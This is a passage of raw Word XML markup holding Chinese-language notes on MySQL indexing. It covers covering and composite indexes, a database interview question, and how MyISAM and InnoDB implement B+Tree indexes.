        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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覆盖索引。同样的有复合索引（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a,b,c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），如果有如下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sql: select a,b,c from table where a=1 and b = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以直接通过遍历索引取得数据，而无需回表，这减少了很多的随机</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作。减少</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，特别的随机</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dba</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主要的优化策略。所以，在真正的实际应用中，覆盖索引是主要的提升性能的优化手段之一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC02AC" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02AC" w:rsidP="002E4165">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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索引列越多，通过索引筛选出的数据越少。有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000W</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条数据的表，有如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sql:select * from table where a = 1 and b =2 and c = 3,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>假设假设每个条件可以筛选出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据，如果只有单值索引，那么通过该索引能筛选出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1000W*10%=100w </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条数据，然后再回表从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100w</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条数据中找到符合</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b=2 and c= 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据，然后再排序，再分页；如果是复合索引，通过索引筛选出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000w *10% *10% *10%=1w</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，然后再排序、分页，哪个更高效，一眼便知</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030289F" w:rsidRPr="00F41A4C" w:rsidRDefault="0030289F" w:rsidP="002E4165">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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参考资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://segmentfault.com/q/1010000000342176</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030289F" w:rsidRPr="00F41A4C" w:rsidRDefault="0030289F" w:rsidP="002E4165">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00063CFA" w:rsidRPr="00F41A4C" w:rsidRDefault="00063CFA" w:rsidP="00063CFA">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1.1.4  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库索引面试题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063CFA" w:rsidRPr="00F41A4C" w:rsidRDefault="00063CFA" w:rsidP="0067709A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00FE3A85" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1) mysql</w:t>
      </w:r>
      <w:r w:rsidR="00FE3A85" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如何实现索引</w:t>
      </w:r>
      <w:r w:rsidR="0067709A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r w:rsidR="00310E99" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00310E99" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>阿里实习生北京站二面</w:t>
      </w:r>
      <w:r w:rsidR="00310E99" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，索引属于存储引擎级别的概念，不同存储引擎对索引的实现方式是不同的，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存储引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存储引擎使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为索引结构，叶节点的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域存放的是数据记录的地址。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引方式也叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非聚集</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的，之所以这么称呼是为了与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的聚集索引区分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽然</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
